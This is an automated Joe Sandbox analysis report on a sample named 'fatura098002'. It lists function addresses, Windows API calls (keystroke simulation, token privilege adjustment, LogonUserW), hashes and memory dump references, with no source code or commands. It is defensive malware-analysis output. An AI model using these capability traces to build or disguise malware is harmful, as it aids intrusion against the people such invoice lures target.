Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 62f09e1281db630971b9c894618148d60419553536a4a122da6a95150f595723
Instruction ID: 4db22098ba80fc688c94f75b5ac8787187a3293a1d415b2f12e44605fba4fa29
Opcode Fuzzy Hash: 62f09e1281db630971b9c894618148d60419553536a4a122da6a95150f595723
Instruction Fuzzy Hash: 9CF030B1105752CFDB349F64E494822B7E4EF143193188A7EE3DA82551C779A844DF10

Function 0076CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0074EE51,007C3630,00000002), ref: 0076CD26

Part of subcall function 0076CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0076CD19,?,?,?), ref: 0076CC59
Part of subcall function 0076CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0076CD19,?,?,?,?,0074EE51,007C3630,00000002), ref: 0076CC6E
Part of subcall function 0076CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0076CD19,?,?,?,?,0074EE51,007C3630,00000002), ref: 0076CC7A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: f9f39dfc82acee12fe1f34e7ab767e0e9453522cd3b70ecf7c96d41dcfea1045
Instruction ID: 95a847bc98b06cc505f6b6b7327e7d79e9fa7bd2c6bac26dc4fe6e05dcc0ac98
Opcode Fuzzy Hash: f9f39dfc82acee12fe1f34e7ab767e0e9453522cd3b70ecf7c96d41dcfea1045
Instruction Fuzzy Hash: F9E06576500704EFC7229F56DD008AABBF8FF84350710852FE996C2510D375AA14DB60

Function 00702DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00702DC4

Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: ac7cf577a51a4d503b56c5f704458c32a42b077c8fdf6ffc785457669d294f61
Instruction ID: 27c0f9e29a5d8daf6498e633b4166fcf12af5742ce933d77dcd0e3b952953ff7
Opcode Fuzzy Hash: ac7cf577a51a4d503b56c5f704458c32a42b077c8fdf6ffc785457669d294f61
Instruction Fuzzy Hash: 69E0CDB26001249BCB11E7589C09FDA77EDDFC8790F054171FD09D7248DA64AD858550

Function 00702B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00703837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00703908

Part of subcall function 0070D730: GetInputState.USER32 ref: 0070D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00702B6B

Part of subcall function 007030F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0070314E

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 7a5c778f4107d848b4588ffad05cfe189f9a63efc1b4e8005b54fbdfff95ac6b
Instruction ID: a0372b331140ac0fc691f83e6959d9226e4edeaf38b6dae853b6fe66a2afc86e
Opcode Fuzzy Hash: 7a5c778f4107d848b4588ffad05cfe189f9a63efc1b4e8005b54fbdfff95ac6b
Instruction Fuzzy Hash: EBE08662304244D7CA04BBB4985A57DB7DD9BD1351F40573FF142432E3DE2C49464252

Function 00FCFBA8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00FCFBB3

Memory Dump Source

Source File: 00000000.00000002.1422505269.0000000000FCF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FCF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fcf000_fatura098002.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 3906ef8e26d3df0c7db13085638d8a44ba58d313c44e21ea8f7304b6300cb170
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 66E0863190910EDBCB18CAA8CA15FA9F3A5EB44320F104669A405C3180D6349D14F755

Function 00FCFB78 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00FCFB83

Memory Dump Source

Source File: 00000000.00000002.1422505269.0000000000FCF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FCF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fcf000_fatura098002.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: cb6c8acc40e295e0bdedac526ab0ac17f3ccac0bef77f9839b2a49faa270b5e2
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 37D05E3190520EABCB10CAA4DA05A99B3A89B05320F104769E91583280D6319E04A750

Function 0074039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00740704,?,?,00000000,?,00740704,00000000,0000000C), ref: 007403B7

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48229f700b6d0411db6ee197a228b00e7d218df2bb1a6fb5d24e90e5bd367312
Instruction ID: 277f44f106ebd114c53dd7436127ff0e821b0d458e9fc318f432b37aee4c1359
Opcode Fuzzy Hash: 48229f700b6d0411db6ee197a228b00e7d218df2bb1a6fb5d24e90e5bd367312
Instruction Fuzzy Hash: 03D06C3204010DBBDF028F84DD06EDA3BAAFB48714F018000BE1856020C736E822AB98

Function 00701CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00701CBC

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 753c7ef9f1badbe84d56a3d9c76acca532267d24d2cc4c5e645a5c7fb3125c88
Instruction ID: b1b6fb201874068e682ace97bd3e0bbc021a85b1825b02652cd074928f073bb0
Opcode Fuzzy Hash: 753c7ef9f1badbe84d56a3d9c76acca532267d24d2cc4c5e645a5c7fb3125c88
Instruction Fuzzy Hash: A3C09B35281304AFF6154784BC5BF107774A358B00F54C003F609555E3C3A51431D658

Function 0077744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00705745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0070949C,?,00008000), ref: 00705773

GetLastError.KERNEL32(00000002,00000000), ref: 007776DE

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: bb642cd1ff95505fb2c9f7f28c19da4ffb910814f145eb17f0b97fea06111637
Instruction ID: d20b79c608d3b1fbc1500d4a7c04db1f72482f823989b51dbc7108f863db5156
Opcode Fuzzy Hash: bb642cd1ff95505fb2c9f7f28c19da4ffb910814f145eb17f0b97fea06111637
Instruction Fuzzy Hash: E3817230608701DFCB19EF28C495A69B7E1BF49354F04865DF88A9B2D2DB38AD45CB92

Function 00FD15A4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00FD15B9

Memory Dump Source

Source File: 00000000.00000002.1422505269.0000000000FCF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FCF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fcf000_fatura098002.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 958419be7e9246e16dc6499ce74406a39d2b12d8d43eaf3e00a668b1e3a9b60e
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: B3E09A7494010DAFDB00DFA4D5496DD7BB4EF04301F1005A1FD0597680DB309A549A62

Function 00706246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,007424E0), ref: 00706266

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: f963b36e38a614cc5f99ca4434ec0baefc4a9e8a0044761775b39c55655f4af3
Instruction ID: 3426d756a1bd261e2fa80ab103f425b1f19a47f512f4b37baf2129bf62a342af
Opcode Fuzzy Hash: f963b36e38a614cc5f99ca4434ec0baefc4a9e8a0044761775b39c55655f4af3
Instruction Fuzzy Hash: C7E09275400B01CEC7314F1AE914412FBE5FEE13613218B2ED0E5926A4D3B458968B50

Function 00FD15A8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00FD15B9

Memory Dump Source

Source File: 00000000.00000002.1422505269.0000000000FCF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FCF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fcf000_fatura098002.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 48db87772669627573d8ae247472ba3438c9bf01a2d903e21c278585a405944a
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 3BE0BF7494010DAFDB00DFA4D54969D7BB4EF04301F100161FD0192680DA309A509A62

Non-executed Functions

Function 00799576 Relevance: 68.9, APIs: 36, Strings: 3, Instructions: 625windowkeyboardnativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2

NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 0079961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0079965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0079969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007996C9
SendMessageW.USER32 ref: 007996F2
GetKeyState.USER32(00000011), ref: 0079978B
GetKeyState.USER32(00000009), ref: 00799798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007997AE
GetKeyState.USER32(00000010), ref: 007997B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007997E9
SendMessageW.USER32 ref: 00799810
SendMessageW.USER32(?,00001030,?,00797E95), ref: 00799918
SetCapture.USER32(?), ref: 0079994A
ClientToScreen.USER32(?,?), ref: 007999AF
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007999D6
ReleaseCapture.USER32 ref: 007999E1
GetCursorPos.USER32(?), ref: 00799A19
ScreenToClient.USER32(?,?), ref: 00799A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00799A80
SendMessageW.USER32 ref: 00799AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00799AEB
SendMessageW.USER32 ref: 00799B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00799B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00799B4A
GetCursorPos.USER32(?), ref: 00799B68
ScreenToClient.USER32(?,?), ref: 00799B75
GetParent.USER32(?), ref: 00799B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00799BFA
SendMessageW.USER32 ref: 00799C2B
ClientToScreen.USER32(?,?), ref: 00799C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00799CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00799CDE
SendMessageW.USER32 ref: 00799D01
ClientToScreen.USER32(?,?), ref: 00799D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00799D82

Part of subcall function 00719944: GetWindowLongW.USER32(?,000000EB), ref: 00719952

GetWindowLongW.USER32(?,000000F0), ref: 00799E05

Strings

@GUI_DRAGID, xrefs: 0079997D
p#}, xrefs: 00799990
F, xrefs: 00799D07

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease
String ID: @GUI_DRAGID$F$p#}
API String ID: 1312020300-3317532684
Opcode ID: 7860ddcfe7588d086cd74e31cc718318118ec5fc56a11adf62deb344dfb45a08
Instruction ID: 8552649ccd0e769501ced7890e6c1a130604db29f6370fbed31be11f0984fcb7
Opcode Fuzzy Hash: 7860ddcfe7588d086cd74e31cc718318118ec5fc56a11adf62deb344dfb45a08
Instruction Fuzzy Hash: 4442AD31204240EFEB25CF68DC48AAABBF5FF49310F10465EF699872A1D739E891CB55

Function 00794873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 007948F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00794908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00794927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0079494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0079495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0079497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 007949AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 007949D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00794A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00794A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00794A7E
IsMenu.USER32(?), ref: 00794A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00794AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00794B20
GetWindowLongW.USER32(?,000000F0), ref: 00794B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00794BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00794C82
wsprintfW.USER32 ref: 00794CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00794CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00794CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00794D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00794D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00794D5A

Strings

%d/%02d/%02d, xrefs: 00794CA8

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 2397c4db4e3bb316be8e39d45ff8467790c558c841971d7142ba858d74abc28c
Instruction ID: 99a6c77eb65ec6794f474a72c9535e37b6cd1d25f93c02eac200b07796faebef
Opcode Fuzzy Hash: 2397c4db4e3bb316be8e39d45ff8467790c558c841971d7142ba858d74abc28c
Instruction Fuzzy Hash: CF12EF71600215ABEF258F28EC49FAE7BF8EF45310F14816AF515EA2E1DB789942CB50

Function 0071F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0071F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0075F474
IsIconic.USER32(00000000), ref: 0075F47D
ShowWindow.USER32(00000000,00000009), ref: 0075F48A
SetForegroundWindow.USER32(00000000), ref: 0075F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0075F4AA
GetCurrentThreadId.KERNEL32 ref: 0075F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0075F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0075F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0075F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0075F4DE
SetForegroundWindow.USER32(00000000), ref: 0075F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0075F4F6
keybd_event.USER32(00000012,00000000), ref: 0075F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0075F50B
keybd_event.USER32(00000012,00000000), ref: 0075F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0075F519
keybd_event.USER32(00000012,00000000), ref: 0075F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0075F528
keybd_event.USER32(00000012,00000000), ref: 0075F52D
SetForegroundWindow.USER32(00000000), ref: 0075F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0075F557

Strings

Shell_TrayWnd, xrefs: 0075F46F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: d4604cd1655c97099567a36da721b976ee5afae75c8d63810b0100b94d68f20c
Instruction ID: 61a340a3037905115773d19141d0f9bfed7a53a3838065a0082c20edcabbf738
Opcode Fuzzy Hash: d4604cd1655c97099567a36da721b976ee5afae75c8d63810b0100b94d68f20c
Instruction Fuzzy Hash: 9531A071A40318BFEF216BB55C4AFBF7E6CEB44B50F204066FA00E61D1D6B85D11AAA4

Function 00761201 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 007616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0076170D
Part of subcall function 007616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0076173A
Part of subcall function 007616C3: GetLastError.KERNEL32 ref: 0076174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00761286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 007612A8
CloseHandle.KERNEL32(?), ref: 007612B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007612D1
GetProcessWindowStation.USER32 ref: 007612EA
SetProcessWindowStation.USER32(00000000), ref: 007612F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00761310

Part of subcall function 007610BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007611FC), ref: 007610D4
Part of subcall function 007610BF: CloseHandle.KERNEL32(?,?,007611FC), ref: 007610E9

Strings

winsta0, xrefs: 007612CC
, xrefs: 0076125A
default, xrefs: 0076130B
Z|, xrefs: 00761392

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

